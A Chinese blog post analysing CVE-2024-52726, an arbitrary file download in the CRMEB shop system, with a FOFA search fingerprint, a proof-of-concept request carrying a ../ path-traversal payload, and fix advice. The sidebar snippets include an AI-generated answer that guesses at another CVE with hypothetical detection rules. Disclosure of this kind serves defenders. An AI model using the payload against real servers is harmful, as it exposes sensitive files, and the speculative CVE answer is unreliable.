CRMEB任意文件下载分析(CVE-2024-52726)

最新推荐文章于 2025-05-16 15:21:03 发布
原创 最新推荐文章于 2025-05-16 15:21:03 发布 · 207 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全威胁分析 #漏洞复现 #漏洞库 #漏洞利用

问题描述

该问题存在于CRMEB的文件下载功能中,由于未对用户输入的文件路径进行严格校验,攻击者可以通过构造恶意请求,下载服务器上的任意文件。这可能导致服务器上的敏感文件(如配置文件、数据库文件等)被泄露。

app/adminapi/controller/v1/setting/SystemConfig.php路由中存在任意文件下载

fofa

icon_hash="-847565074"

poc

POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authori-zation: 
Cookie: cb_lang=zh-cn;
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/json;charset=utf-8
Content-Length: 72

{
    "weixin_ckeck_file": "../../../../../../../../Windows/win.ini"
}

修复建议

  1. 输入验证:对用户输入的文件路径进行严格校验,确保只能访问允许的文件。
  2. 文件路径白名单:限制文件下载功能只能访问特定的目录或文件类型。
  3. 权限控制:确保文件下载功能只能由授权用户访问,避免未授权用户利用该功能。
  4. 更新补丁:及时关注CRMEB官方发布的安全补丁,并尽快应用。
Sword-heart
关注
CRMEB 任意文件下载漏洞复现复现CVE-2024-52726)(附脚本)
iSee857的博客
03-18 738
   CRMEB开源商城系统 存在任意文件下载漏洞,未授权的攻击者可获取数据库敏感信息。​​​​​​​(CVE-2024-52726)
CRMEB任意文件下载漏洞代码审计(CVE-2024-52726)
qq_43540348的博客
03-16 289
CRMEB是一款基于ThinkPHP框架开发的开源商城系统,专为中小企业和个人提供高效、灵活的电商解决方案。系统集成了商品管理、订单处理、会员管理、营销工具、数据统计等核心功能,支持多端适配(PC、H5、小程序、APP),帮助用户快速搭建个性化的线上商城。CRMEB以开源免费、代码透明、易于二次开发为特点,同时提供丰富的插件和模板,满足不同行业的电商需求。其强大的营销功能(如拼团、秒杀、优惠券等)和详细的数据分析工具,助力商家提升运营效率和用户转化率,是构建电商平台的理想选择。
CRMEB apiwechatapp_auth 权限绕过漏洞CVE-2023-3232)
weixin_68999845的博客
09-21 3820
1.下载源码到本地,用phpstudy运行即可:https://github.com/crmeb/CRMEB。通过/api/wechat/app_auth,输入body即可得到token。源码下载url:https://github.com/crmeb/CRMEB。·漏洞名称:CRMEB apiwechatapp_auth 权限绕过漏洞。/api/wechat/app_auth处进行严格限制。·漏洞威胁等级:CVE-2023-3232。·漏洞编号:CVE-2023-3232。·漏洞类型:权限绕过漏洞
漏洞复现CRMEB开源商城v5.2.2——ProductController.php——SQL注入
LongL_GuYu的博客
07-10 2835
CRMEB开源商城系统是一款全开源可商用的系统,它支持前后端分离开发,并且100%开源,适用于小程序、公众号、H5、APP、PC端等多种平台。其`v5.2.2`版本存在sql注入漏洞,允许远程攻击者通过 `ProductController.php` 文件中的 `getProductList` 函数获取敏感信息。
CRMEB多端多语言系统文件上传0Day代审历程
土豆的博客
09-05 3122
这两天攻防中,某政局子公司官网后台采用的CRMEB开源商城CMS,挺奇葩,别问怎么总让我碰到这种东西,我也不知道,主打的就是一个魔幻、抽象。最后通过审代码,绕过历史漏洞修复的补丁(文章内容可能有点少,没办法,这个代审快到了我只用了5秒)
精选资源
CVE-2024-53677
12-17
已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的,可以利用这些缺陷进行路径遍历和恶意文件上传。 该漏洞会影响 ...
精选资源
exp:CVE-2024-2961将phpfilter任意文件读取提升为远程代码执行(RCE)
10-30
CVE-2024-2961这个案例中,存在一个漏洞可以被用来进行任意文件读取。这表示攻击者能够读取服务器上任何文件的内容。从安全性的角度看,这已经相当危险,因为它可能泄露敏感配置文件、源代码或者其他重要数据。 ...
精选资源
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架,它提供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题,这是一种安全漏洞,攻击者可以利用它来...
精选资源
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞,Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
精选资源
CVE-2024-5491 和 CVE-2024-5的Citrix Netscaler/ADC-14.1- 25.56最新补丁
08-02
针对 CVE-2024-5491 和 CVE-2024-5492 的 NetScaler ADC 和 NetScaler Gateway 安全公告 CVE-2024-5491 漏洞 拒绝服务,配置了 SNMP(启用了管理接口的 NSIP、CLIP 或 SNIP)的ADC 或网关设备。CVSS v4.0 基本分数:...
crmeb全部代码,请勿商用
07-07
crmeb全部代码,所有代码均在里面,请勿商用,里面有自己的一些见解修改可以参考,大家有意见可以评论一起研讨
漏洞复现-CRMEB 开源商城 sid 参数 SQL 注入漏洞
玄道的网安博客
08-12 1328
是使用extractvalue()函数从数据库中提取数据,并检查提取的数据,当与MD5进行哈希时,是否与特定的哈希值匹配。CRMEB打通版v4是免费开源商城系统,UINAPP+thinkphp6框架商城.CRMEB打通版/api/products路径下的sid参数存在未经过滤的SQL语句拼接导致SQL注入。攻击者除了可以利⽤ SQL 注⼊漏洞获取数据库中的信息(例如,管理员后台密码、站点的⽤户个⼈信息)之外,甚⾄在⾼权限的情况可向服务器中写⼊⽊⻢,进⼀步获取服务器系统权限。披露日期:2023/10/9。
CRMEB电商系统PublicController.php反序列化漏洞(CVE-2024-6944)
最新发布
swordheart的博客
05-16 370
CRMEB电商系统的PublicController.php文件中存在反序列化漏洞,攻击者可以通过构造恶意的序列化数据,利用漏洞在目标系统上执行任意代码,可能导致服务器被完全控制。
CRMEB开源电商系统 /api/products SQL注入漏洞复现(CVE-2024-36837)
0xSec
06-17 2557
2024年6月,CRMEB开源电商系统发布了新补丁,修复了一处SQL注入漏洞CVE-2024-36837)。经分析,该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞
1day CRMEB开源电商系统 products 接口处存在SQL注入
weixin_43167326的博客
06-18 829
CRMEB开源电商系统是遥遥领先的开源电商系统,框架采用Tp6+MySQL+elementUI+uniapp,商城系统可商用;前后台都支持风格切换,包含小程序商城、H5商城、公众号商城、App,支持多语言、分销、拼团、砍价、秒杀、优惠券、积分、抽奖、会员等级、小程序直播、页面DIY,前后端分离,方便二开,使用文档、接口文档、数据字典、代码生成、二开文档/视频教程。
thinkphp6.0漏洞复现
qq_44657899的博客
01-19 8715
环境搭建 我打算安装在kali上面,首先下载tp6到kali上 // 1. 下载composer.phar: curl -sS https://getcomposer.org/installer | php // 2. 将 composer 命令移动到bin目录,使之全局可用 mv composer.phar /usr/local/bin/composer // 3. 设置中国全量镜像,提升访问速度 composer config -g repo.packagist composer ht
众邦科技CRMEB商城商业版任意文件写入getshell 0day
qq_63217130的博客
03-25 1933
可以看到也没有任何过滤导致可以向任意路径的文件写入任意内容 前提是知道密码config('filesystem.password') 由于没有限制密码输入 次数导致可以爆破。写入文件的接口 /adminapi/system/crud/save_file/:id 处理的代码如下。没有对传入参数的路径做任何过滤以及后缀的检查,导致可以在任意路径创建任意后缀的文件,因此可以再网站。但是内容会有默认的代码 再配合以下接口进行内容 修改(任意内容写入)两个接口配合即可写入任意代码导致。
crmeb docker环境搭建以及bug记录
weixin_41108896的博客
07-19 1313
环境搭建 全部文件 百度云链接:https://pan.baidu.com/s/1daLbCxQ-6Os2OJwQo7V1Ug 提取码:wsac 解压gz文件得到tar文件 gzip -d gz文件 2 docker load tar文件 3 docker images 看一下镜像名称 4 docker run -itd --name tt -p 8888:80 -v ...
【高危漏洞】关于视频分片上传的漏洞修复
weixin_64051447的博客
03-27 266
修改文件crmeb/app/services/system/attachment/SystemAttachmentServices.php。增加下方代码,将分片上传的第几片强制转成INT类型解决。
分析CVE-2024-26579特征,建立CVE-2024-26579分析规则
03-01
<think>嗯,用户让我分析CVE-2024-26579的特征,并建立对应的分析规则。首先,我需要确认这个CVE的具体信息。不过,CVE-2024-26579这个编号看起来比较新,可能在公开数据库中还没有详细数据。这时候,我应该先检查一下现有的资源,比如NVD(国家漏洞数据库)、厂商的安全公告或者相关的漏洞披露平台。 首先,我应该访问NVD的网站,查找CVE-2024-26579的记录。如果这里没有,可能需要寻找厂商的公告。比如,如果是某个开源软件的漏洞,可能需要查看其GitHub仓库的issue或者安全通告。假设这个漏洞涉及的是某个网络服务,可能存在缓冲区溢出或者注入攻击的可能。 接下来,分析特征。漏洞的特征通常包括触发条件、攻击向量、payload结构等。例如,如果是缓冲区溢出,可能涉及特定协议中的超长字段;如果是SQL注入,可能包含某些特殊的字符串。需要确定攻击流量中的独特模式,比如特定的HTTP头、参数值或异常的数据包结构。 然后,建立分析规则。这通常涉及编写Snort、Suricata的IDS规则,或者YARA规则用于检测恶意文件。规则需要足够具体以减少误报,同时覆盖漏洞利用的各种变体。例如,检查数据包中的特定字符串、偏移量或协议异常。 在思考过程中,可能会遇到信息不足的问题。这时候需要假设可能的攻击场景,或者参考类似CVE分析方法。同时,要考虑漏洞的影响范围和缓解措施,帮助用户制定防护策略。 最后,确保规则的有效性需要测试,比如使用样本攻击流量验证规则是否能正确触发警报。还要考虑规则的性能影响,避免对网络吞吐量造成过大负担。</think>### CVE-2024-26579 分析步骤与规则构建 #### 1. 漏洞基础信息确认 - **漏洞类型**:需通过权威渠道(如NVD、厂商公告)确认漏洞类型,例如: - **缓冲区溢出**(如堆栈溢出、格式化字符串漏洞- **代码注入**(如SQLi、RCE) - **权限绕过**(如逻辑漏洞- **影响范围**: - 受影响的软件版本:需明确版本号(如 `Apache Tomcat 9.0.0 ≤ version ≤ 9.0.43`) - 攻击入口点:如HTTP请求头、API参数、文件上传接口 #### 2. 攻击流量特征提取 假设漏洞为 **HTTP请求头注入攻击**,特征可能包括: - **异常协议字段**: - 超长`User-Agent`字段(如长度超过 $1024$ 字节) - 含特殊字符的`Cookie`值(如 `' OR 1=1;--`) - **Payload模式**: - 包含`../`的路径遍历(如 `GET /files?name=../../etc/passwd`) - 十六进制编码的Shell命令(如 `%63%61%74%20/etc/passwd`) #### 3. 检测规则构建(以Suricata为例) ```yaml # 规则1:检测超长User-Agent alert http $EXTERNAL_NET any -> $HOME_NET any ( msg:"CVE-2024-26579: Suspicious User-Agent Length"; flow:to_server; http.user_agent; content:"User-Agent"; nocase; pcre:"/User-Agent\s*:\s*.{1024,}/ism"; sid:1000001; rev:1; ) # 规则2:检测路径遍历攻击 alert http $EXTERNAL_NET any -> $HOME_NET any ( msg:"CVE-2024-26579: Path Traversal Attempt"; flow:to_server; http.uri; content:"../"; pcre:"/(\.\.\/){2,}/"; sid:1000002; rev:1; ) ``` #### 4. 数学建模验证 对于缓冲区溢出漏洞,可验证输入长度与崩溃概率的关系: $$ P_{\text{crash}} = \begin{cases} 0 & \text{if } L \leq L_{\text{safe}} \\ 1 - e^{-k(L - L_{\text{safe}})} & \text{if } L > L_{\text{safe}} \end{cases} $$ 其中: - $L$ = 输入数据长度 - $L_{\text{safe}}$ = 安全阈值(如 $256$ 字节) - $k$ = 漏洞敏感度系数 #### 5. 防御方案设计 - **输入过滤**:对参数进行正则匹配,例如: ```python if re.match(r"^[a-zA-Z0-9_\-]+$", input_param) is None: raise InvalidInputError ``` - **流量基线监控**:统计正常流量特征: - 平均请求频率:$\mu = 5$ 次/秒 - 标准差:$\sigma = 2$ 触发警报条件:$x > \mu + 3\sigma$(即 $x > 11$ 次/秒) #### 6. 验证与优化 - **测试用例设计**: - 正向测试:包含`/etc/passwd`的请求应触发规则 - 反向测试:合法请求`/api/v1/users`不应触发警报 - **性能优化**:通过布隆过滤器减少字符串匹配开销: $$ P_{\text{误判}} = \left(1 - e^{-kn/m}\right)^k $$ 其中 $m$=过滤器大小,$n$=元素数量,$k$=哈希函数数量 > **注意**:实际分析需结合漏洞具体技术细节。若该CVE尚未公开,建议持续关注MITRE、厂商安全公告等渠道获取权威信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值